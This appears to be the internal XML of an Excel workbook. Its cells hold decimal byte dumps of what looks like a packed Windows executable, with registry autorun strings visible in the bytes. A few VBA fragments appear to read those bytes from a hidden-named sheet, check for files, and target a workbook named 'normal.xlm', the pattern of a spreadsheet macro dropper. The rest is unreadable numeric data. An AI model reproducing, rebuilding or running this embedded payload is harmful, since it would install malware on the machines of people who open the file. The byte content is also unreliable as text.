146 23 122 232 0 100 194 14 50 95 116 125 22 72 228 144 9 57 122 49 115 153 144 67 38 26 108 3 225 156 16 14 101 162 236 1 239 165 179 193 244 135 89 81 210 127 236 45 141 60 124 152 121 9 5 230 21 128 92 242 92 242 15 4 135 3 142 75 242 92 242 2 149 1 83 201 1 27 100 14 6 19 223 254 32 131 12 200 7 176 8 200 128 12 50 129 9 82 201 131 156 61 10 235 116 16 38 11 235 99 7 57 249 228 250 253 12 235 82 206 13 235 57 121 144 147 65 162 14 235 48 118 84 144 </t>
  </si>
  <si>
    <t xml:space="preserve">23 37 248 249 223 12 240 186 189 5 166 241 157 170 50 219 134 128 180 102 107 162 47 4 132 177 89 7 136 187 248 47 253 50 216 136 68 53 248 195 53 240 70 131 254 8 124 234 221 106 8 216 29 1 7 58 44 9 179 11 70 16 82 55 204 58 63 240 14 90 95 198 70 246 213 100 208 172 220 51 83 123 4 106 110 196 124 180 48 189 104 172 185 106 14 179 174 225 214 33 187 164 160 21 54 135 64 238 135 156 61 72 181 129 232 53 153 233 114 193 64 227 212 207 56 66 96 9 75 50 152 61 55 218 1 3 12 117 37 119 59 220 179 19 185 144 20 27 21 88 104 247 129 38 41 3 8 100 87 190 181 138 147 29 173 219 14 248 253 248 172 50 203 246 252 154 164 104 155 88 118 26 96 252 70 253 106 94 9 70 216 183 153 146 252 98 28 75 157 31 244 34 172 196 180 79 1 33 91 176 100 86 83 77 16 8 97 3 54 5 240 79 73 13 183 82 56 201 62 75 118 38 144 139 96 134 78 184 248 161 206 188 215 209 18 207 170 175 16 3 157 43 55 196 74 209 254 226 87 230 7 247 184 90 128 217 24 2 208 22 112 99 251 130 15 198 104 196 137 236 2 224 0 179 109 60 132 250 87 154 240 11 92 161 65 11 238 53 96 5 235 87 218 112 117 148 174 85 242 7 220 198 220 51 35 219 6 243 87 35 100 104 19 169 10 27 157 33 104 1 204 72 228 115 205 21 168 228 170 38 11 23 39 155 139 109 102 136 8 216 35 4 50 120 217 160 27 51 75 87 86 1 123 216 111 220 74 29 8 102 20 3 131 249 228 77 216 119 176 45 209 187 11 186 211 224 193 224 86 236 227 172 23 70 54 183 30 24 79 41 116 216 4 176 102 127 251 187 111 24 146 15 183 192 104 15 175 193 131 192 31 153 53 136 106 32 89 247 249 33 46 109 11 25 180 30 236 160 132 40 110 182 238 6 176 117 140 208 144 1 227 148 2 152 219 150 101 89 156 160 164 168 54 198 94 3 176 1 188 141 68 8 40 135 212 51 23 110 208 218 89 227 255 13 117 132 2 232 106 5 39 208 237 15 243 165 111 112 176 128 31 115 0 13 180 232 24 119 86 181 211 178 </t>
  </si>
  <si>
    <t>If Workbooks(i).Name = "normal.xlm" Then</t>
  </si>
  <si>
    <t xml:space="preserve">137 103 77 10 133 80 122 213 53 221 72 188 142 115 191 228 141 164 13 190 183 21 3 120 237 76 76 248 128 111 123 152 0 74 175 154 120 241 60 88 228 177 211 12 86 104 96 198 91 104 108 4 119 5 38 128 108 17 76 147 235 133 8 199 216 208 74 195 214 73 131 80 106 40 1 11 225 35 87 86 69 222 246 49 214 5 31 104 84 42 252 244 29 79 200 177 118 8 87 37 76 78 81 180 16 133 237 77 186 74 139 2 41 87 20 175 99 178 1 244 53 204 0 129 223 32 40 45 211 72 139 84 36 60 248 183 189 139 160 68 211 68 106 56 137 18 12 22 192 193 214 112 84 104 40 62 137 27 24 28 176 237 110 55 226 81 141 10 16 82 11 36 199 3 52 113 6 233 28 32 7 56 60 225 46 152 27 54 98 44 13 4 141 51 98 105 163 250 241 81 252 126 254 79 29 10 11 124 104 90 8 197 84 140 47 184 240 108 0 167 14 217 26 138 223 194 11 148 235 26 200 129 28 49 253 19 177 176 195 98 34 23 144 0 170 90 174 59 162 153 12 46 171 13 247 111 87 196 99 81 82 101 80 140 194 16 44 246 111 187 255 255 112 8 139 209 87 139 120 20 193 234 8 136 20 62 139 80 20 17 66 137 6 136 12 50 112 47 187 253 139 72 20 65 95 137 4 94 195 79 72 16 50 104 141 13 22 101 86 243 209 196 57 248 191 185 239 185 78 139 118 16 83 65 99 202 139 217 193 233 2 243 165 139 203 219 237 191 23 111 3 243 164 18 72 28 3 250 137 7 1 81 133 88 118 183 125 182 20 16 16 218 137 10 43 21 16 41 81 18 201 182 253 238 64 28 101 133 201 95 91 117 6 8 8 108 16 65 227 15 111 0 96 8 133 219 85 173 239 131 187 170 49 70 139 115 28 60 95 10 190 239 126 23 94 131 253 4 15 143 82 12 133 237 15 140 74 20 67 216 216 108 166 172 31 55 131 59 7 11 44 224 64 153 168 239 132 103 115 37 119 61 154 7 16 53 18 20 252 199 168 218 75 16 122 149 131 248 42 139 78 32 137 30 254 183 237 55 202 20 137 110 32 117 114 13 40 49 124 131 233 8 193 225 12 129 193 251 238 183 63 191 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(filesv) Then</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 1 15 0 8 2 16 0 106 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 107 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 108 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 109 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 110 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 111 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 112 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 113 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 114 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 115 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 116 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 117 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 118 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 119 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 120 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 121 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 122 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 123 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 124 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 125 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 126 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 127 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 1 2 6 0 96 0 1 0 22 0 1 2 6 0 97 0 1 0 22 0 1 2 6 0 98 0 1 0 22 0 1 2 6 0 99 0 1 0 22 0 1 2 6 0 100 0 1 0 22 0 1 2 6 0 101 0 1 0 22 0 1 2 6 0 102 </t>
  </si>
  <si>
    <t xml:space="preserve">109 33 162 169 44 197 3 224 175 181 191 193 232 16 44 1 131 210 52 42 77 43 199 61 102 162 195 174 143 125 76 28 98 123 61 190 247 224 127 19 189 170 177 20 21 187 253 29 106 250 211 215 137 74 104 33 125 45 140 129 116 110 216 226 219 44 137 134 185 231 186 75 199 44 89 48 90 100 89 110 20 26 26 216 127 195 36 111 52 190 17 8 109 54 56 54 1 0 104 32 109 143 48 102 116 12 44 17 41 102 114 120 123 163 241 111 109 32 66 46 19 32 82 97 51 101 114 44 16 240 237 192 60 56 79 204 255 37 252 100 100 100 43 81 5 248 244 240 100 100 100 100 236 232 228 224 100 100 100 100 220 216 212 208 100 100 100 100 204 200 196 192 100 100 100 100 188 184 180 176 100 100 100 100 172 168 164 160 100 100 100 100 156 152 148 144 100 100 100 100 140 136 132 128 100 100 100 100 124 120 116 112 100 100 100 100 108 104 100 96 100 100 100 100 92 88 84 80 100 100 100 100 76 72 68 64 100 100 100 100 60 52 48 44 100 100 100 100 40 36 32 28 100 100 100 100 24 20 16 12 115 100 100 100 8 4 0 252 178 200 200 200 200 248 244 240 236 200 200 200 200 232 228 224 220 200 200 200 200 216 212 208 204 200 200 200 200 200 196 192 188 200 200 200 200 184 180 176 172 70 182 205 200 168 164 204 204 31 160 156 65 70 70 70 152 148 144 140 124 145 177 140 13 136 15 132 128 121 62 191 147 124 178 221 120 178 116 178 112 25 25 25 25 108 104 100 96 228 59 25 25 92 88 177 5 144 100 100 100 100 148 152 156 160 100 100 100 100 164 168 172 176 100 100 100 100 180 184 188 192 100 100 100 100 196 200 204 208 115 100 100 100 212 216 220 0 180 35 35 207 231 228 177 4 178 8 12 16 35 35 35 35 20 24 28 32 35 35 35 35 36 40 44 52 35 35 35 35 56 60 64 68 35 35 35 35 72 76 80 84 44 138 5 54 86 106 48 241 79 234 187 8 152 12 150 106 12 104 240 201 1 177 20 143 69 137 246 134 106 131 168 59 78 4 176 8 104 38 162 42 219 20 23 40 4 152 53 55 144 101 232 40 58 128 110 6 129 125 119 192 8 222 </t>
  </si>
  <si>
    <t xml:space="preserve">0 92 0 82 0 49 0 42 0 35 0 53 0 98 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 50 0 1 16 0 42 0 92 0 82 0 48 0 42 0 35 0 49 0 52 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 49 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 49 0 48 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 97 0 49 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 49 0 52 0 51 0 49 0 55 0 49 0 50 0 97 0 55 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 53 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 223 2 0 0 0 0 0 255 255 255 255 52 0 0 0 1 0 0 0 8 0 0 0 60 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 202 1 0 108 0 0 128 8 0 10 0 0 0 0 0 0 0 0 128 9 0 0 0 0 0 255 255 255 255 34 129 12 0 6 0 9 0 16 0 0 0 0 129 8 0 10 0 34 0 24 9 0 0 0 129 8 0 60 0 115 0 24 0 0 0 0 129 8 0 2 0 3 0 88 0 0 0 0 129 8 0 2 0 2 0 96 0 0 0 0 129 8 0 48 0 90 0 104 0 0 0 0 129 8 0 20 0 49 0 152 0 0 0 0 129 8 0 36 0 50 0 176 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">194 246 118 107 109 128 57 30 250 235 64 64 8 24 117 249 6 219 216 45 125 242 43 198 47 68 78 209 248 142 64 2 244 82 181 70 93 3 205 52 255 215 150 218 146 190 53 59 235 116 50 50 20 178 35 168 185 14 218 28 85 198 36 37 33 219 211 12 234 173 14 203 39 92 9 139 109 139 179 117 3 86 158 64 185 83 137 78 230 218 6 157 76 165 133 177 116 60 127 91 3 151 96 139 199 204 56 123 251 4 246 43 199 183 194 146 182 64 106 85 206 170 251 235 11 107 226 69 75 186 86 79 198 87 61 224 192 161 103 60 198 40 185 236 208 64 27 200 236 68 206 104 17 58 210 164 169 48 101 50 27 21 43 70 232 139 82 199 182 32 69 123 245 70 175 134 41 54 115 26 128 208 182 119 233 109 117 198 70 93 161 35 245 8 5 27 163 166 33 247 235 226 141 225 159 92 102 139 109 12 160 163 66 117 197 157 68 233 94 91 250 108 11 185 48 141 220 184 96 74 127 128 237 45 182 46 124 2 118 57 11 125 82 191 164 108 83 45 115 76 143 130 56 131 127 165 187 235 253 137 7 141 136 24 247 24 128 96 126 8 236 5 26 148 64 219 30 8 129 193 124 136 253 153 99 228 213 73 124 187 235 6 139 9 13 208 226 86 251 209 126 70 172 251 54 114 209 184 208 138 77 140 193 1 126 203 208 88 209 149 251 165 0 88 30 173 66 70 108 192 207 146 40 38 224 6 221 137 8 47 136 147 71 69 51 47 240 89 227 254 124 186 80 236 60 216 255 154 216 117 77 251 214 133 6 227 0 4 129 180 106 246 88 235 136 17 186 15 112 195 72 243 192 245 88 84 168 63 98 178 219 131 255 115 23 87 102 12 158 137 62 111 141 210 15 208 6 128 78 106 234 10 3 117 10 246 37 118 55 8 235 4 5 128 67 28 3 124 155 255 184 53 86 153 45 54 80 254 68 209 4 133 90 109 156 98 104 120 172 91 122 148 118 192 99 100 85 163 128 122 9 58 54 60 45 46 35 224 74 15 72 154 112 80 6 96 26 117 195 127 213 145 35 247 224 85 89 104 160 48 176 233 145 112 29 175 66 108 93 57 139 229 116 234 190 116 130 76 247 65 4 6 </t>
  </si>
  <si>
    <t xml:space="preserve">111 114 32 192 13 10 228 191 217 47 84 76 79 83 83 17 14 0 83 73 78 71 253 101 237 7 0 68 79 77 65 18 17 82 54 48 50 56 111 127 121 187 8 45 32 75 97 98 108 116 111 32 105 110 105 86 97 108 105 126 190 217 183 122 13 104 101 97 112 55 39 55 110 111 116 239 182 255 214 61 4 117 103 104 32 115 112 97 99 35 102 123 108 111 119 105 185 236 54 96 56 97 6 111 110 55 54 103 32 121 10 115 116 100 53 219 90 251 237 112 117 114 43 118 105 114 116 117 33 51 165 99 35 66 190 216 246 32 99 12 108 40 95 52 246 218 118 155 95 42 101 120 92 47 88 6 220 190 176 147 189 226 95 49 57 247 111 112 101 96 219 238 230 88 49 115 111 15 100 101 115 99 43 112 107 109 50 56 70 36 129 101 100 36 223 64 136 25 87 35 55 242 109 187 61 109 117 108 172 116 104 191 97 47 108 111 99 107 131 173 16 70 23 52 100 112 107 205 109 183 97 46 2 162 33 114 109 10 91 251 214 0 112 64 103 114 97 109 32 74 109 54 45 133 189 16 47 48 57 79 16 92 163 209 12 65 42 43 48 46 240 125 10 249 43 56 97 114 103 117 40 115 109 215 158 135 95 48 50 102 193 110 110 103 130 179 214 197 182 111 5 116 58 17 100 230 127 120 91 104 133 77 45 96 57 102 21 86 105 115 221 30 140 127 170 67 43 43 32 82 160 76 105 98 180 114 121 237 225 48 247 39 10 45 22 69 14 33 17 187 108 141 179 80 212 58 194 0 46 0 60 229 189 109 174 13 224 37 44 107 108 119 110 62 194 29 27 191 27 71 101 116 76 97 50 65 2 118 101 80 174 107 219 89 236 117 112 19 15 87 149 100 38 135 198 23 254 127 101 115 115 97 103 101 66 111 120 65 0 117 115 37 51 50 46 100 42 185 229 179 164 63 62 79 66 3 113 57 72 243 11 242 246 118 81 122 81 78 81 85 8 157 182 27 148 124 201 165 255 159 71 91 28 64 127 251 187 250 64 107 98 116 131 111 64 115 104 101 51 35 39 114 98 43 0 70 36 56 217 131 44 1 192 123 64 7 1 1 149 41 185 140 96 16 2 140 184 192 150 34 31 2 </t>
  </si>
  <si>
    <t xml:space="preserve">104 33 73 106 171 89 94 52 85 194 217 168 18 71 190 54 154 189 22 251 97 75 232 39 237 129 244 66 250 220 254 6 35 229 77 55 96 221 237 221 167 254 0 88 11 97 147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</si>
  <si>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 22 1 0 6 0 1 0 0 44 22 0 0 228 0 0 0 232 6 0 0 44 27 0 0 70 27 0 0 194 42 0 0 1 0 0 0 1 0 0 0 118 117 176 137 0 0 255 255 1 0 0 0 128 0 0 0 182 0 255 255 1 1 0 0 0 0 255 255 255 255 0 0 0 0 255 255 68 0 255 255 0 0 88 51 140 199 210 172 10 75 161 124 36 163 193 228 131 245 42 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 50 53 13 92 110 12 76 69 149 255 218 198 95 199 44 60 16 0 0 0 3 0 0 0 5 0 0 0 7 0 0 0 255 255 255 255 255 255 255 255 1 1 8 0 0 0 255 255 255 255 120 0 0 0 8 50 53 13 92 110 12 76 69 149 255 218 198 95 199 44 60 88 51 140 199 210 172 10 75 161 124 36 163 193 228 131 245 255 255 0 0 0 0 77 69 0 0 255 255 255 255 255 255 0 0 0 0 255 255 0 0 0 0 255 255 1 1 0 0 0 0 223 0 255 255 0 0 0 0 28 0 255 255 255 255 255 255 12 0 255 255 255 255 255 255 16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0 5 0 0 2 0 83 16 255 255 255 255 0 0 1 0 83 12 255 255 255 255 0 0 1 0 83 148 255 255 255 255 0 0 6 0 96 148 255 255 28 2 0 0 4 0 48 148 255 255 56 2 0 0 0 0 62 34 255 255 255 255 0 0 0 0 2 60 24 1 255 255 0 0 0 0 2 60 24 0 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 </t>
  </si>
  <si>
    <t xml:space="preserve">151 200 237 34 2 5 11 192 11 3 50 72 51 29 4 150 141 50 32 131 52 8 142 143 3 50 32 3 144 145 146 34 2 50 32 147 178 4 38 232 40 7 223 103 140 1 242 142 111 12 16 219 32 5 147 25 205 118 12 234 32 99 252 244 98 7 9 200 52 77 211 52 10 164 16 120 17 217 52 77 211 72 18 36 19 248 97 166 105 154 102 24 192 25 152 26 116 175 105 154 96 27 40 28 100 7 120 105 154 102 217 240 96 121 224 122 208 180 105 154 166 252 204 255 188 248 3 247 2 210 156 123 1 22 22 7 174 11 122 135 59 115 180 13 243 65 186 65 154 6 9 12 7 8 1 249 94 144 9 199 27 11 189 96 223 123 87 59 7 15 87 231 32 223 123 239 19 231 227 3 23 33 131 12 50 216 53 15 65 67 80 13 54 216 96 51 82 23 83 7 87 55 216 96 131 95 89 123 108 23 109 171 11 210 52 77 32 112 28 114 199 54 216 96 223 47 128 179 129 7 130 31 205 96 131 12 131 132 143 145 41 216 32 131 52 158 161 164 111 96 131 13 50 167 183 159 206 31 95 118 14 194 215 11 24 7 0 1 2 4 222 155 160 24 66 196 96 130 121 130 247 223 79 158 253 0 166 223 7 161 165 129 159 224 252 47 64 192 222 155 231 126 128 252 168 193 163 218 163 211 0 96 131 156 61 129 254 7 64 181 47 255 221 32 67 65 182 95 207 162 228 162 26 0 229 162 232 187 207 87 200 162 91 126 161 254 81 5 3 218 94 229 175 236 183 218 95 95 218 106 218 50 47 211 216 222 224 249 40 2 4 218 49 126 57 210 10 9 21 89 222 58 234 162 10 56 135 80 177 255 86 81 72 70 105 108 101 84 121 112 101 12 128 182 2 244 86 101 114 115 93 11 69 90 197 86 209 57 161 99 88 49 123 1 218 12 72 246 70 114 101 34 191 189 10 87 140 195 13 67 108 111 115 101 115 255 190 251 72 97 110 100 108 26 70 108 117 115 104 76 66 117 102 102 70 67 64 207 222 114 87 114 101 17 65 65 108 103 5 104 107 14 10 82 227 20 84 187 100 39 64 206 101 104 94 67 117 160 179 203 110 91 101 110 123 83 161 80 214 198 238 26 </t>
  </si>
  <si>
    <t xml:space="preserve">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8 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 0 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">1 0 0 0 2 0 0 0 3 0 0 0 4 0 0 0 5 0 0 0 6 0 0 0 7 0 0 0 8 0 0 0 9 0 0 0 10 0 0 0 11 0 0 0 12 0 0 0 13 0 0 0 14 0 0 0 15 0 0 0 16 0 0 0 17 0 0 0 18 0 0 0 19 0 0 0 20 0 0 0 21 0 0 0 22 0 0 0 23 0 0 0 24 0 0 0 25 0 0 0 26 0 0 0 27 0 0 0 28 0 0 0 29 0 0 0 30 0 0 0 31 0 0 0 32 0 0 0 33 0 0 0 34 0 0 0 35 0 0 0 36 0 0 0 37 0 0 0 38 0 0 0 39 0 0 0 40 0 0 0 41 0 0 0 42 0 0 0 43 0 0 0 44 0 0 0 45 0 0 0 46 0 0 0 47 0 0 0 254 255 255 255 49 0 0 0 50 0 0 0 51 0 0 0 52 0 0 0 53 0 0 0 54 0 0 0 55 0 0 0 56 0 0 0 57 0 0 0 58 0 0 0 254 255 255 255 60 0 0 0 254 255 255 255 62 0 0 0 63 0 0 0 64 0 0 0 65 0 0 0 66 0 0 0 254 255 255 255 68 0 0 0 69 0 0 0 70 0 0 0 71 0 0 0 72 0 0 0 73 0 0 0 74 0 0 0 75 0 0 0 76 0 0 0 77 0 0 0 78 0 0 0 79 0 0 0 80 0 0 0 81 0 0 0 82 0 0 0 83 0 0 0 84 0 0 0 85 0 0 0 86 0 0 0 87 0 0 0 88 0 0 0 89 0 0 0 90 0 0 0 91 0 0 0 92 0 0 0 93 0 0 0 94 0 0 0 95 0 0 0 96 0 0 0 97 0 0 0 98 0 0 0 99 0 0 0 100 0 0 0 101 0 0 0 102 0 0 0 103 0 0 0 104 0 0 0 105 0 0 0 106 0 0 0 107 0 0 0 108 0 0 0 109 0 0 0 110 0 0 0 111 0 0 0 112 0 0 0 113 0 0 0 114 0 0 0 115 0 0 0 116 0 0 0 117 0 0 0 118 0 0 0 119 0 0 0 120 0 0 0 121 0 0 0 254 255 255 255 123 0 0 0 124 0 0 0 125 0 0 0 126 0 0 0 127 0 0 0 128 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">127 101 115 85 110 104 112 100 161 32 191 231 28 208 112 10 30 25 60 77 111 185 5 104 236 100 117 108 114 78 68 65 148 64 79 6 212 181 69 6 83 116 114 123 55 133 45 204 115 24 87 180 105 100 101 67 98 155 221 1 125 114 84 111 77 200 66 121 116 246 44 136 13 97 43 22 87 179 221 43 64 79 21 67 111 244 39 28 100 215 186 207 102 18 228 111 109 109 13 76 47 164 240 151 160 177 30 97 235 112 73 110 102 111 65 208 217 173 157 45 68 253 79 111 121 12 67 16 11 250 74 24 135 86 17 146 149 11 159 139 82 116 108 12 119 105 23 131 21 94 16 97 49 101 12 83 179 195 44 97 123 72 32 119 61 214 198 222 67 80 114 10 65 11 7 79 69 77 52 194 31 130 9 131 65 100 100 114 135 76 117 51 160 6 246 209 58 83 66 18 38 252 249 100 79 102 200 41 52 9 109 55 132 62 48 67 77 134 19 241 130 77 216 65 13 87 241 11 97 0 66 246 120 65 15 204 240 82 209 246 158 69 3 76 128 27 156 227 6 240 31 70 144 224 0 15 1 11 1 6 8 58 3 120 54 48 19 125 23 80 96 18 224 102 175 153 11 3 247 128 201 54 108 7 23 144 130 101 103 147 183 12 16 7 170 4 28 50 174 20 100 83 100 93 128 16 166 167 176 30 95 176 205 15 46 116 101 120 116 118 66 144 235 16 134 104 115 97 69 32 46 114 40 178 37 76 110 83 212 7 3 2 105 110 177 230 64 46 38 39 200 27 112 38 96 74 6 112 192 12 0 80 2 186 236 243 164 4 0 0 0 0 0 0 0 72 255 0 0 0 0 0 0 0 96 190 0 128 64 0 141 190 0 144 255 255 87 131 205 255 235 16 144 144 144 144 144 144 138 6 70 136 7 71 1 219 117 7 139 30 131 238 252 17 219 114 237 184 1 0 0 0 1 219 117 7 139 30 131 238 252 17 219 17 192 1 219 115 239 117 9 139 30 131 238 252 17 219 115 228 49 201 131 232 3 114 13 193 224 8 138 6 70 131 240 255 116 116 137 197 1 219 117 7 139 30 131 238 252 17 219 17 201 1 219 117 7 139 30 131 238 252 17 219 17 201 117 32 65 1 219 117 </t>
  </si>
  <si>
    <t xml:space="preserve">46 36 103 59 135 120 182 243 16 15 155 11 187 108 63 17 19 1 23 17 25 18 179 179 131 44 17 3 128 3 53 47 221 32 205 100 23 4 4 127 71 133 133 176 185 144 7 14 227 17 111 54 203 110 121 36 183 212 39 255 255 146 134 151 216 189 255 203 43 67 77 121 70 114 109 87 110 100 11 27 199 17 11 228 242 66 151 24 153 18 153 187 64 94 200 102 17 12 153 6 23 211 52 203 174 0 3 250 152 244 238 232 77 211 52 77 226 220 214 208 202 196 52 77 211 52 190 184 178 172 166 108 154 101 211 160 216 153 210 204 150 152 108 154 101 179 144 198 153 192 186 134 152 154 166 97 179 128 180 153 183 152 152 152 217 53 77 103 23 96 174 168 3 88 152 157 109 154 102 82 76 70 64 152 235 58 211 52 77 215 7 52 3 46 40 34 28 101 211 52 77 22 16 10 4 254 151 154 166 105 154 248 242 236 230 224 218 105 154 166 105 212 206 200 194 188 166 105 154 166 182 176 170 164 158 255 191 105 154 152 146 140 83 79 70 84 87 65 82 69 92 77 105 99 114 111 255 255 23 254 115 111 102 116 92 87 105 145 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 253 102 219 240 92 82 117 110 167 114 98 3 97 83 101 83 104 117 116 255 95 248 223 39 110 80 114 105 118 105 108 101 103 101 167 101 102 97 117 108 116 32 73 77 69 0 111 141 91 59 180 112 58 227 37 34 77 101 170 255 205 214 183 97 31 46 116 120 116 195 0 75 69 89 95 85 83 69 82 83 131 253 255 96 11 76 79 67 65 76 95 77 65 67 72 73 78 69 19 67 31 178 177 219 85 82 149 78 84 39 0 19 67 79 78 70 223 252 63 216 73 71 39 76 65 83 83 69 83 95 82 79 79 84 40 196 172 200 207 120 187 253 174 41 251 194 214 181 32 35 49 15 202 253 8 206 180 201 239 222 126 183 203 195 41 143 85 115 206 45 65 103 215 58 32 37 100 111 187 45 198 13 10 135 221 116 16 45 76 4 103 116 104 110 127 251 101 23 68 73 83 80 93 89 0 73 68 82 95 152 73 84 237 183 236 221 3 70 79 23 11 59 109 83 234 47 </t>
  </si>
  <si>
    <t>hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value</t>
  </si>
  <si>
    <t xml:space="preserve">1 22 1 0 6 0 1 0 0 124 7 0 0 228 0 0 0 40 3 0 0 244 8 0 0 2 9 0 0 122 10 0 0 0 0 0 0 1 0 0 0 118 117 148 62 0 0 255 255 35 0 0 0 136 0 0 0 182 0 255 255 1 1 0 0 0 0 255 255 255 255 0 0 0 0 255 255 64 0 255 255 0 0 125 11 180 57 181 125 97 76 169 75 57 57 134 51 32 116 25 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 254 124 78 192 108 34 191 76 136 243 12 48 73 15 20 198 16 0 0 0 3 0 0 0 5 0 0 0 7 0 0 0 255 255 255 255 255 255 255 255 1 1 8 0 0 0 255 255 255 255 120 0 0 0 8 254 124 78 192 108 34 191 76 136 243 12 48 73 15 20 198 125 11 180 57 181 125 97 76 169 75 57 57 134 51 32 116 255 255 0 0 0 0 77 69 0 0 255 255 255 255 255 255 0 0 0 0 255 255 0 0 0 0 255 255 1 1 0 0 0 0 223 0 255 255 0 0 0 0 80 0 255 255 255 255 255 255 12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64 1 0 0 2 0 91 76 255 255 255 255 0 0 1 0 83 16 255 255 255 255 0 0 1 0 83 148 255 255 255 255 0 0 1 0 184 34 255 255 24 2 0 0 0 0 62 34 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 </t>
  </si>
  <si>
    <t xml:space="preserve">16 219 133 99 191 82 101 6 97 199 100 101 108 253 238 191 108 64 115 105 102 32 101 120 105 115 116 12 32 103 111 116 111 32 112 128 189 145 32 61 255 92 107 119 77 132 146 92 0 49 46 98 88 75 140 189 113 184 80 79 83 2 79 48 56 120 155 58 182 51 124 43 109 250 228 175 192 192 135 70 119 97 60 243 219 251 215 92 64 67 116 114 108 123 137 112 73 110 102 111 181 205 221 181 82 97 114 73 100 93 185 105 95 42 91 182 236 19 13 63 148 75 212 223 94 135 32 100 117 99 116 75 101 91 47 92 107 13 237 65 100 109 39 7 114 162 95 15 183 141 216 246 119 71 100 75 48 115 76 105 112 54 215 110 191 116 203 83 121 35 101 109 76 73 42 108 89 236 230 232 66 99 53 49 92 48 79 12 40 109 173 241 78 97 109 118 30 79 103 67 218 246 55 215 112 84 114 101 100 79 114 103 97 96 122 94 204 53 6 246 124 23 154 184 139 23 222 178 22 202 151 69 27 83 68 191 113 176 100 176 192 66 117 198 100 78 117 109 98 214 184 66 120 239 132 32 128 242 76 120 100 87 0 17 210 209 119 41 144 133 47 158 92 42 46 42 235 48 